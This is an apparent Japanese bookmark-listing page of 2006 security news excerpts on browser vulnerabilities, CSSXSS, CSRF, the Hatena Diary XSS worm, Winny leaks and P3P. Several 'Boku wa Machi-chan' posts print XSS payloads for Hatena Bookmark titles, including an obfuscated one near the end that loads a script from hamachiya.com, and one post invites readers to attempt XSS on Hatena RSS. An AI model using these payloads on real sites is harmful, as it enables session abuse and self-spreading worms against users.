IEでWindowsショートカットを起動できるのはセキュリティ脆弱性でない--MSが強調
ユーザーが「Internet Explorer(IE)」にウェブアドレスをタイプした際に実行ファイルを起動できるWindowsショートカットはセキュリティ脆弱性ではないと、Microsoftが主張している。 Windows XPおよびIEを利用している場合、例えば「www.microsoft.com」などのウェブアドレスをブラウザに入力すると、同ウェブサイトを開く代わりに、コンピュータのデスクトップ上にある実行ファイルを起動させることができる。 このショートカットを実行するには、次のような手順を踏めばよい。 デスクトップから右クリックして、「新規作成」、「ショートカット」を選択する 同ショートカットの場所を「c:\windows\system32\calc.exe」などの実行可能なファイルに設定する 同ショートカットの名前を「www.microsoft.com」とする IEを立ち上げ、アド
IEとFirefoxに脆弱性--実証コードも公開に
MicrosoftのInternet Explorerに2件の脆弱性が見つかった。そのうち1件はMozillaのFirefoxにも影響すると、セキュリティ専門家らが注意を呼びかけている。 ネットワーク上の脅威を監視するSANS Internet Storm Centerは米国時間6月28日に勧告を出し、既に両脆弱性を悪用するコードが公開されているものの、攻撃例については今のところ報告されていないと発表した。 勧告によると、IEとFirefoxの両ブラウザに影響する脆弱性は、あるウェブサイトから別のウェブサイトに配信されたドキュメントへのアクセス処理方法に関するものだという。 McAfeeのGlobal Threat Groupでシニアマネージャーを務めるMonty Ijzerman氏によると、IEやFirefoxに存在する同脆弱性はクロスサイトスクリプティングと呼ばれる手口を使って悪用され
「技術的には容易」、Winny開発者が語る情報漏えい対策の中身 - @IT
2006/5/3 Winnyを開発した金子勇氏が5月2日、アスキー主催の「情報漏えい対策セミナー」に登場し、「Winny開発者から見た情報漏えいの具体的な対策」を説明した。金子氏は「対策は私から見ると容易に思える」と語った。 金子氏は現在、Winnyによる著作権法違反ほう助の疑いで公判中。そのためWinnyの開発ができない状態だ。Winnyは、警察の要請を受けて金子氏が開発を停止した2003年11月27日以降、「放置されている状態」(金子氏)。ただ、金子氏はどのようなバージョンアップやパッチを適用すれば、いま出回っているWinnyウイルスによる情報流出をブロックできるかは分かっているようだ。 金子氏は「問題の本質は、Winnyのアップフォルダを指定する設定ファイル『UpFolder.txt』をウイルスが書き換えできること」と話す。WinnyではUpFolder.txtに記述されたフォルダの
なぜCSSXSSに抜本的に対策をとることが難しいか - いしなお! (2006-03-31)
_ なぜCSSXSSに抜本的に対策をとることが難しいか CSSXSSの説明について、その脅威を過剰に表現している部分がありました。その部分について加筆訂正しています。 @ 2006/4/3 tociyukiさんによる「[web]MSIE の CSSXSS 脆弱性とは何か」および「[web]開発者サイドでの CSSXSS 脆弱性対策」には、より正確なCSSXSS脆弱性の内容およびそれに対するサーバーサイド開発者で可能な対策について紹介されていますので、是非そちらもご覧ください。 @ 2006/4/4 今までも何度かこの辺の話はあまり具体的ではなく書いてきたけど、そろそろCSSXSSを悪用したい人には十分情報が行き渡っただろうし、具体的な話を書いてもこれ以上危険が増すということはないだろうから、ちょっと具体的に書いてみる。 ちなみに私自身は、CSSXSSの攻撃コードなどを実際に試したりといった
開発者のための正しいCSRF対策
著者: 金床 <anvil@jumperz.net> http://www.jumperz.net/ ■はじめに ウェブアプリケーション開発者の立場から見たCSRF対策について、さまざまな情報が入り乱れている。筆者が2006年3月の時点において国内のウェブサ イトやコンピュータ書籍・雑誌などでCSRF対策について書かれている記事を調べた結果、おどろくべきことに、そのほとんどが誤りを含んでいたり、現実的 には使用できない方法を紹介したりしていた。そこで本稿ではウェブアプリケーション開発者にとっての本当に正しいCSRF対策についてまとめることとす る。また、採用すべきでないCSRF対策とその理由も合わせて紹介する。 ■あらゆる機能がターゲットとなりうる ウェブアプリケーションの持つ全ての機能がCSRF攻撃の対象となりうる。まずこのことを認識しておく必要がある。 Amaz
Firefoxのセキュリティ・ホールを突くプログラムが出回る
米US-CERTの<a href="http://www.us-cert.gov/cas/techalerts/TA06-038A.html" target=_blank>Technical Cyber Security Alert</a> 米SANS Instituteは現地時間2月7日,Webブラウザ「Firefox」のセキュリティ・ホールを突くプログラムがネット上で公開されているとして注意を呼びかけた。プログラムを悪用されると,Firefoxが稼働するマシン上で任意のプログラムを実行される恐れがある。対策は,修正済みのFirefox 1.5.0.1にバージョンアップすること。JavaScriptを無効にすることでも回避できる。 公開されているプログラム(Exploit)が突くセキュリティ・ホールは,「Location および Navigator オブジェクト上での QueryInte
はてなダイアリーにXSS脆弱性を突いて広がるワームが発生、現在修正済 | スラド
Anonymous Coward曰く、"はてなダイアリーのキーワード「ぼくはまちちゃん!とは」によると、2月4日、はてなにログイン中のユーザ達が XSS脆弱性を利用した攻撃ページ d.hatena.ne.jp/Hamachiya2/ にアクセスした際に、JavaScriptによる自動処理で自分の日記に「ぼくはまちちゃん! こんにちはこんにちは!!」という内容のエントリを書き込まされてしまうという被害が出た模様だ。書き込まされたエントリには罠ページへのリンクも埋め込まれていたため、ワーム的に広がったようだ。被害者たちの様子は罠ページのトラックバック欄で見ることができる。また、罠ページのはてなブックマークにも「こんにちはこんにちは!!」と書き込まされていたようだ。 原因は、はてなダイアリーにXSS脆弱性が残っていたことで、tableタグのbackground属性にjavascript:のURI
そうそう、はてなRSSにも - ぼくはまちちゃん!
べんり機能があるんだけど (グループのところだよ) → http://r.hatena.ne.jp/Hamachiya2/ ここはあまりにも制約がきつすぎてあきらめました>< グループ名がはてなRSSのJavascript部に展開される時にクォート類がバックスラッシュでエスケープされる (これは当然だけど…) ひとつのグループに65文字 (これは複数つかえばなんとか) スラッシュ、ドット、クエスチョンが使えない (これがきつい) 特にスラッシュが封じられてるのがどうしようもなくて ぼくは投げちゃいました! </script><script src=xx>とか、後ろをコメントアウトとかできれば 簡単なんだけど…! try catch使うとか後ろをregexpに見立ててしまうとか、 色々ためしてみたものの、ぼくには無理だったので、 だれか腕に自信のある人は、alert表示とかできるかやってみて
はてなダイアリーの隠し機能で楽々更新 :: ぼくはまちちゃん!
やっぱりダイアリーってくらいだから、まいにち綴りたいものですよね!! だけど時間がなかったり、ネタがなかったりで なかなか日記が続かないとお悩みのあなたにこれ…! ぼくはまちちゃん!(Hatena) - 日記を自動的に書いてくれる日記 ※IE系のブラウザ限定でしかうごきません。ごめんね>< ※上のリンク先を見たら、自動的に日記とブックマークが一件づつ追加されちゃいます ※なので、見たあとは自分の日記とブックマークをよく確認してくださいね (参考url) 上のリンク先のブックマークコメント (追記) 動かなくなっちゃいました>< → http://d.hatena.ne.jp/hatenadiary/20060204/1139066130
はてなブックマークの超べんり機能 :: ぼくはまちちゃん!
タイトルを↓みたいに編集すれば、ユーザーが自由にScriptつかえちゃうんだね! ぼく、ゆめがひろがりんぐです! "width=100 height=100 onmouseover=alert(String.fromCharCode(88,83,83)) ※最初にダブルクォート、最後に空白をひとついれる。 あ、人気エントリーのタイトルとか書き換えたらダメだよ…! えらいことになっちゃうかも? (追記) http://test/ ってurlのブックマークにテスト用のコードを置いてみたよ! タイトルが以下になってて hamachiya.com/h のscriptを呼び出す感じ。 (消しゴムに触れると呼び出されて、hamachiya.comをブックマークに追加してしまうという内容) "width=100 height=100 onmouseover=d=document;t=String; s=
情報処理推進機構:セキュリティセンター:脆弱性関連情報取扱い:安全なウェブサイトの作り方
IPAでは、ウェブサイト運営者が、ウェブサイト上で発生しうる問題に対し、適切な対策ができるようにするための注意事項として、『安全なウェブサイトの作り方』を取りまとめ、公開いたしました。 この資料は、昨年(2005年3月4日)にショッピングサイト運営者がウェブサイト上で発生しうる問題に対し、適切な対策ができるようにするための注意事項として発行した『消費者向け電子商取引サイトの運用における注意点』を、より広いウェブサイトの運営者に利用いただくことを目的に、内容の全面改訂を行ったものです。 『安全なウェブサイトの作り方』では、「ウェブアプリケーションのセキュリティ実装」として、IPAが届出を受けたソフトウエア製品およびウェブアプリケーションの脆弱性関連情報を基に、届出件数の多かった脆弱性や攻撃による影響度が大きい脆弱性を取り上げ、脆弱性の原因そのものをなくす根本的な解決策と、攻撃による影響の低減
ジャパンネット銀行が全利用者にワンタイムパスワード採用 | スラド
現状でも、口座維持手数料が残高から引き落とされなくても、口座自体が使えなくなる訳でなく、 せいぜい提携ATMの引出手数料の無料回数が0回になるだけで、通常残高を口座維持手数料以下に していても、全然困る事が無い。口座自体が閉鎖されるわけでもないし。 もともとヤフオク決済用にと開設した口座なので、基本的に残高を常に0に近い状態にしている。 そうすれば、無駄に残高を残しておくより、口座維持手数料の節約にもなる。 最初から、口座に10万円以上の残高を置いておくとか、振込の利用頻度が高い利用者にしてみれば これまでどうりの口座維持手数料は無料であり、中途半端に残高を残している休眠状態の口座の 利用者から、何らかの理由つけて金を巻き上げているだけのように感じる。 むしろ、トークンの導入コストを上乗せするのであれば、振込手数料に上乗せすべきでは… と、思うんですが… 口座維持手数料払ってない利用者だっ
ジャパンネット銀行がワンタイム・パスワードを採用,利用者全員が対象
ジャパンネット銀行は1月26日,ネットバンキングの取引認証にワンタイム・パスワードを採用することを発表した。同行の口座利用者の全員(およそ130万人)が対象。9月からはワンタイム・パスワードによる認証に統一し,乱数表(IDカード)を使った従来の認証方法は利用できなくなる。なお,ワンタイム・パスワードの生成には,RSAセキュリティのハードウエア・トークン「SecurID」を採用。利用者全員に配布する。 ジャパンネット銀行によれば,ネットバンキングの取引認証をトークンによるワンタイム・パスワードに統一するのは国内初の試みであるという。また,RSAセキュリティによれば,利用者全員にハードウエア・トークンのSecurIDを配布するのは世界でも初めてだという。 トークンは5月ごろから順次配布し,9月ごろをめどに完了する予定。なお,今回の取引認証の変更をはじめとするセキュリティ・インフラの強化ならびに
【絵で分かるキーワード】P3P(The Platform for Privacy Preferences Project、ぴーすりーぴー)
●【P3Pの仕組み】 P3P(The Platform for Privacy Preferences Project):XMLで定義されたプライバシーポリシー記述言語 オンラインショッピングなどでのWebサイトで、「顧客情報の取り扱い」「弊社のプライバシーポリシー」などのリンクを見かけることが多くなった。ユーザー登録で得た個人情報、例えば名前やメールアドレスを第三者に開示しないとか、Cookieによるユーザーの行動履歴追跡データをマーケティングデータとして第三者に提供しないとか、Webサイトが収集しえるプライバシー情報の取り扱い方を、明示的に文書化したものだ。 しかし、多くは決して読みやすい文章ではないし、ほとんどのユーザーは億劫で読みさえしないだろう。こうした面倒を解決してくれるのが、XMLで定義されたタグセット、P3Pだ。XMLで記述された文書は、HTML文書と同じで「人間には、ちょ
P3P 1.0 の公開について (W3C 勧告)
Web における個人情報の利用について、より一層の制御を可能にする P3P 推薦状もご覧ください。 http://www.w3.org/ -- 2002年4月16日 -- World Wide Web Consortium (W3C) は Platform for Privacy Preferences (P3P) 1.0 を W3C 勧告として公開いたしました。これは、XML に基づく Web サイト上のプライバシーポリシーの表現を可能にする言語について、 業界をまたがる合意が得られたことを示しています。P3P が W3C 勧告として宣言されたことは、本仕様が安定した文書であり、Web の相互運用性の確保に貢献し、また W3C 会員組織によって検討がなされ、 その幅広い採用が支持されたことを意味します。P3P は、 プライバシー擁護者、Web 技術先導者、 データ保護委員や世界規模の電子
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
0-DAY - SIMPLE SQL INJECTION
メッセージ
三井住友銀行 > 簡単!やさしいセキュリティ教室
"width=100 height=100 onmouseover=d=document;t=String;s=d.createElement(t.fromCharCode(115,99,114,105,112,116));s.src=t.fromCharCode(104,116,116,112,58,47,47,104,97,109,97,99,104,105,121,97,46,99,111,109,47,104);d.body.appendChild(s)
【コラム】最新IT用語解説 (8) P3P(Platform for Privacy Preferences) | エンタープライズ | マイコミジャーナル